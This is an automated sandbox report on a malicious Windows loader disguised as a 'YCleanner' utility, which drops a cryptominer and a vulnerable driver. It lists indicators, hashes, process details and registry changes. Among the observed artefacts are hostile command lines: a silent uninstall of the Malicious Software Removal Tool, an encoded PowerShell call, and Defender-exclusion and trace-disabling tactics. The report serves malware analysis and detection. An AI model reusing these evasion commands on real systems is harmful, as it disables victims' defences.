File name: _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe

Full analysis: https://app.any.run/tasks/740c0dae-dc0d-4db1-bb2a-fc680d4d08b6
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 24, 2025, 15:05:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
loader
miner
pastebin
silentcryptominer
winring0-sys
vuln-driver
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 4 sections
MD5: FAFB03A25C7988CBCACBFCB786891C9E
SHA1: 4837D8EACE46157567FE962F36D1FA6E4AAE8E19
SHA256: 86A0497B6B95420D558CC3A6CBAA79F4D599474EDF8910ECBCA7802888464201
SSDEEP: 98304:Hb1814ZSRdZgVWpByBj8drJiQpWMU7kDfT1SK5Yynn8Tm8ujdYJS+dkcQC84panx:MCkzF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • PowerShell executes remote file download (POWERSHELL)

      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 7832)
    • Executing a file with an untrusted certificate

      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
    • Changes Windows Defender settings

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)
    • Adds extension to the Windows Defender exclusion list

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)
    • Uninstalls Malicious Software Removal Tool (MRT)

      • cmd.exe (PID: 7016)
      • cmd.exe (PID: 4804)
    • Vulnerable driver has been detected

      • gtbcekieflhl.exe (PID: 6416)
    • MINER has been detected (SURICATA)

      • svchost.exe (PID: 2276)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • ycc.exe (PID: 7924)
      • yc.exe (PID: 7860)
    • Drops 7-zip archiver for unpacking

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
    • Starts CMD.EXE for commands execution

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)
    • Executing commands from a ".bat" file

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
    • Executable content was dropped or overwritten

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • cmd.exe (PID: 7536)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • powershell.exe (PID: 7984)
      • WindowsUpdater.exe (PID: 7376)
      • cmd.exe (PID: 7512)
      • 7z.exe (PID: 7768)
      • WindowsUpdater.exe (PID: 6680)
      • 7z.exe (PID: 7668)
      • WindowsUpdater.exe (PID: 7700)
      • 7z.exe (PID: 7232)
      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)
    • The executable file from the user directory is run by the CMD process

      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7768)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7744)
      • Installer.exe (PID: 7820)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7656)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 7668)
      • Installer.exe (PID: 7760)
      • 7z.exe (PID: 7664)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 2724)
      • 7z.exe (PID: 7228)
      • Installer.exe (PID: 7660)
    • Reads security settings of Internet Explorer

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • yc.exe (PID: 7860)
      • ycc.exe (PID: 7924)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsDefender.exe (PID: 6252)
      • ycc.exe (PID: 476)
      • yc.exe (PID: 8184)
      • ycc.exe (PID: 7724)
      • yc.exe (PID: 7652)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7536)
      • cmd.exe (PID: 7512)
      • cmd.exe (PID: 1844)
      • cmd.exe (PID: 1364)
    • Starts POWERSHELL.EXE for commands execution

      • ycc.exe (PID: 7924)
      • Installer.exe (PID: 7820)
      • ycc.exe (PID: 476)
      • ycc.exe (PID: 7724)
      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)
    • Base64-obfuscated command line is found

      • ycc.exe (PID: 7924)
      • ycc.exe (PID: 476)
      • ycc.exe (PID: 7724)
    • BASE64 encoded PowerShell command has been detected

      • ycc.exe (PID: 7924)
      • ycc.exe (PID: 476)
      • ycc.exe (PID: 7724)
    • Executes application which crashes

      • ycorig.exe (PID: 7904)
      • ycorig.exe (PID: 7908)
      • ycorig.exe (PID: 7688)
    • There is functionality for taking screenshot (YARA)

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
    • Starts process via Powershell

      • powershell.exe (PID: 7812)
    • Connects to unusual port

      • WindowsDefender.exe (PID: 6252)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)
    • Script adds exclusion path to Windows Defender

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)
    • Manipulates environment variables

      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7788)
    • Script adds exclusion extension to Windows Defender

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)
    • Windows service management via SC.EXE

      • sc.exe (PID: 5760)
      • sc.exe (PID: 7724)
    • Starts SC.EXE for service management

      • Installer.exe (PID: 2620)
    • Creates a new Windows service

      • sc.exe (PID: 7676)
    • Stops a currently running service

      • sc.exe (PID: 7848)
    • Non windows owned service launched

      • gtbcekieflhl.exe (PID: 6416)
    • Process uninstalls Windows update

      • wusa.exe (PID: 7664)
      • wusa.exe (PID: 1372)
    • Drops a system driver (possible attempt to evade defenses)

      • gtbcekieflhl.exe (PID: 6416)
    • Executes as Windows Service

      • gtbcekieflhl.exe (PID: 6416)
    • Crypto Currency Mining Activity Detected

      • svchost.exe (PID: 2276)
  • INFO

    • The sample compiled with english language support

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
    • Create files in a temporary directory

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • WindowsUpdater.exe (PID: 7376)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7768)
      • 7z.exe (PID: 7744)
      • yc.exe (PID: 8184)
      • yc.exe (PID: 7652)
      • WindowsUpdater.exe (PID: 6680)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 7656)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 7664)
      • WindowsUpdater.exe (PID: 7700)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 2724)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 7228)
    • Checks supported languages

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • mode.com (PID: 7596)
      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • ycc.exe (PID: 7924)
      • ycorig.exe (PID: 7904)
      • WindowsDefender.exe (PID: 6252)
      • WindowsUpdater.exe (PID: 7376)
      • mode.com (PID: 7624)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7744)
      • 7z.exe (PID: 7768)
      • Installer.exe (PID: 7820)
      • Installer.exe (PID: 2620)
      • yc.exe (PID: 8184)
      • ycc.exe (PID: 476)
      • Installer.exe (PID: 7460)
      • ycorig.exe (PID: 7908)
      • yc.exe (PID: 7652)
      • ycorig.exe (PID: 7688)
      • ycc.exe (PID: 7724)
      • WindowsDefender.exe (PID: 5720)
      • WindowsUpdater.exe (PID: 6680)
      • mode.com (PID: 5228)
      • Installer.exe (PID: 7176)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 7656)
      • Installer.exe (PID: 7760)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7664)
      • WindowsUpdater.exe (PID: 7700)
      • WindowsDefender.exe (PID: 7956)
      • mode.com (PID: 2576)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 2724)
      • 7z.exe (PID: 7228)
      • Installer.exe (PID: 7660)
      • gtbcekieflhl.exe (PID: 6416)
    • Reads the computer name

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • ycorig.exe (PID: 7904)
      • ycc.exe (PID: 7924)
      • WindowsUpdater.exe (PID: 7376)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7744)
      • WindowsDefender.exe (PID: 6252)
      • 7z.exe (PID: 7768)
      • ycc.exe (PID: 476)
      • yc.exe (PID: 8184)
      • ycorig.exe (PID: 7908)
      • ycorig.exe (PID: 7688)
      • ycc.exe (PID: 7724)
      • yc.exe (PID: 7652)
      • WindowsUpdater.exe (PID: 6680)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7656)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7664)
      • WindowsUpdater.exe (PID: 7700)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 7228)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 2724)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)
    • Process checks computer location settings

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • ycc.exe (PID: 7924)
      • yc.exe (PID: 7860)
      • WindowsUpdater.exe (PID: 7376)
      • ycc.exe (PID: 476)
      • yc.exe (PID: 8184)
      • yc.exe (PID: 7652)
      • ycc.exe (PID: 7724)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 7596)
      • mode.com (PID: 7624)
      • mode.com (PID: 5228)
      • mode.com (PID: 2576)
    • Disables trace logs

      • powershell.exe (PID: 7984)
    • Reads the machine GUID from the registry

      • ycorig.exe (PID: 7904)
      • ycorig.exe (PID: 7908)
      • ycorig.exe (PID: 7688)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 8176)
      • WerFault.exe (PID: 1136)
      • WerFault.exe (PID: 7828)
    • Checks proxy server information

      • WerFault.exe (PID: 8176)
      • powershell.exe (PID: 7984)
      • WindowsDefender.exe (PID: 6252)
      • WerFault.exe (PID: 1136)
      • WerFault.exe (PID: 7828)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)
      • slui.exe (PID: 2724)
    • The executable file from the user directory is run by the Powershell process

      • WindowsUpdater.exe (PID: 7376)
      • WindowsDefender.exe (PID: 6252)
      • Installer.exe (PID: 2620)
      • WindowsDefender.exe (PID: 5720)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsDefender.exe (PID: 7956)
      • WindowsUpdater.exe (PID: 7700)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 592)
      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7788)
    • Creates files in the program directory

      • Installer.exe (PID: 2620)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7788)
    • The sample compiled with japanese language support

      • gtbcekieflhl.exe (PID: 6416)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2012:05:28 09:05:18+00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit
PEType: PE32
LinkerVersion: 8
CodeSize: 102400
InitializedDataSize: 38400
UninitializedDataSize: -
EntryPoint: 0x1945f
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.3.2.5
ProductVersionNumber: 1.3.2.5
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
LegalCopyright: Copyright © 2025
OriginalFileName: YC.exe
FileVersion: 1.3.2.5
ProductName: YCleanner
ProductVersion: 1.3.2.5
InternalName: YC.exe
FileDescription: YCleanner
Created: 7z SFX Constructor v4.6.0.0 (http://usbtor.ru/viewtopic.php?t=798)
Builder: ahileeeeeess 15:17:48 24/11/2025
No data.
All screenshots are available in the full report
Total processes: 257
Monitored processes: 110
Malicious processes: 16
Suspicious processes: 7

Behavior graph

The interactive process tree is available in the full report. Node labels shown in the graph: _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe, cmd.exe, conhost.exe, mode.com, 7z.exe, attrib.exe, yc.exe, ycorig.exe, ycc.exe, powershell.exe, werfault.exe, windowsdefender.exe, windowsupdater.exe, installer.exe, winrar.exe, sc.exe, wusa.exe, slui.exe, explorer.exe, gtbcekieflhl.exe (flagged THREAT) and svchost.exe (flagged #MINER).

Process information

PID: 476 | CMD: "C:\Users\admin\AppData\Local\Temp\ycc.exe" | Path: C:\Users\admin\AppData\Local\Temp\ycc.exe | Parent process: yc.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\ycc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shell32.dll
PID: 592 | CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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" | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Parent process: ycc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 1036 | CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\file_4.zip | Path: C:\Program Files\WinRAR\WinRAR.exe | Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1136 | CMD: C:\WINDOWS\system32\WerFault.exe -u -p 7908 -s 960 | Path: C:\Windows\System32\WerFault.exe | Parent process: ycorig.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\oleaut32.dll
PID: 1364 | CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\main\main.bat" /S" | Path: C:\Windows\System32\cmd.exe | Parent process: WindowsUpdater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1372 | CMD: wusa /uninstall /kb:890830 /quiet /norestart | Path: C:\Windows\System32\wusa.exe | Parent process: cmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Update Standalone Installer
Exit code:
87
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wusa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\gdi32.dll
PID: 1844 | CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\main\main.bat" /S" | Path: C:\Windows\System32\cmd.exe | Parent process: WindowsUpdater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 2276 | CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | Path: C:\Windows\System32\svchost.exe | Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2308 | CMD: 7z.exe e extracted/file_5.zip -oextracted | Path: C:\Users\admin\AppData\Local\Temp\main\7z.exe | Parent process: cmd.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
MEDIUM
Description:
7-Zip Console
Exit code:
0
Version:
19.00
Modules
Images
c:\users\admin\appdata\local\temp\main\7z.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
PID: 2576 | CMD: mode 65,10 | Path: C:\Windows\System32\mode.com | Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
DOS Device MODE Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mode.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\ureg.dll
c:\windows\system32\msvcp_win.dll
Total events: 83 480
Read events: 83 349
Write events: 131
Delete events: 0

Modification events

(PID) Process: (7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: ProxyBypass | Value: 1

(PID) Process: (7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: IntranetName | Value: 1

(PID) Process: (7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: UNCAsIntranet | Value: 1

(PID) Process: (7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: AutoDetect | Value: 0

(PID) Process: (7860) yc.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation: write | Name: SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000

(PID) Process: (7860) yc.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: ProxyBypass | Value: 1

(PID) Process: (7860) yc.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: IntranetName | Value: 1

(PID) Process: (7860) yc.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: UNCAsIntranet | Value: 1

(PID) Process: (7860) yc.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: AutoDetect | Value: 0

(PID) Process: (7984) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write | Name: EnableFileTracing | Value: 0
Executable files: 20
Suspicious files: 40
Text files: 32
Unknown types: 0

Dropped files

PID: 7464 | Process: _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe | Filename: C:\Users\admin\AppData\Local\Temp\main\file.bin | Type: compressed
MD5: AA9B56905815F8E68CD5A3FB871636FB | SHA256: E86180BF42CABC0E43DCCAC6A5AC83213D2405D02756810A79DDB2EA3F954FAB

PID: 7464 | Process: _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe | Filename: C:\Users\admin\AppData\Local\Temp\main\main.bat | Type: text
MD5: 5248E52EB41DA692D903D3B0568E5D9D | SHA256: 74EFCF4CD2EA55354E4AD37AD89D0499BAD78042C6EBB3BBF14BD556598E595F

PID: 7716 | Process: 7z.exe | Filename: C:\Users\admin\AppData\Local\Temp\main\extracted\file_4.zip | Type: compressed
MD5: 97C0964E426B83B6AA56CB8D160409D7 | SHA256: 021AEEB6539551BE1DE8ECE9C13B41DC50A5D317C97CCAE170203B9E093F1CDE

PID: 7860 | Process: yc.exe | Filename: C:\Users\admin\AppData\Local\Temp\ycorig.exe | Type: executable
MD5: 8198EFBEF12EB506D8E3B7B1D0F13C0F | SHA256: C9AEB9CC12F2D3F5ACB795855E2928CDAD253CA7C82FD3F5D72CE0B95EBE6BAD

PID: 7788 | Process: 7z.exe | Filename: C:\Users\admin\AppData\Local\Temp\main\extracted\file_1.zip | Type: compressed
MD5: 8CBEA872E2A16B69E1AACE3931848780 | SHA256: F00FF2B632DE8CD42EEB39DF87C2494E04C86BAA01CF2DC233C81D943CFAE86D

PID: 7536 | Process: cmd.exe | Filename: C:\Users\admin\AppData\Local\Temp\main\file.zip | Type: compressed
MD5: AA9B56905815F8E68CD5A3FB871636FB | SHA256: E86180BF42CABC0E43DCCAC6A5AC83213D2405D02756810A79DDB2EA3F954FAB

PID: 8176 | Process: WerFault.exe | Filename: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ycorig.exe_2a4d858f9c8433b46313eb262510d3eba04ca5d0_e64a7acc_8197303d-72d6-4a9a-a2cf-63dd5c7ba52d\Report.wer
MD5: - | SHA256: -

PID: 8176 | Process: WerFault.exe | Filename: C:\Users\admin\AppData\Local\CrashDumps\ycorig.exe.7904.dmp
MD5: - | SHA256: -

PID: 7464 | Process: _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe | Filename: C:\Users\admin\AppData\Local\Temp\main\7z.dll | Type: executable
MD5: 72491C7B87A7C2DD350B727444F13BB4 | SHA256: 34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891

PID: 7464 | Process: _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe | Filename: C:\Users\admin\AppData\Local\Temp\main\KillDuplicate.cmd | Type: text
MD5: 68CECDF24AA2FD011ECE466F00EF8450 | SHA256: 64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 32
TCP/UDP connections: 61
DNS requests: 25
Threats: 10

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2316 | svchost.exe | GET | 200 | 2.16.164.91:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
5596 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.91:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
- | - | POST | 200 | 20.190.159.23:443 | https://login.live.com/RST2.srf | US | xml | 10.3 Kb | unknown
- | - | POST | 200 | 20.190.159.4:443 | https://login.live.com/RST2.srf | US | - | 11.0 Kb | unknown
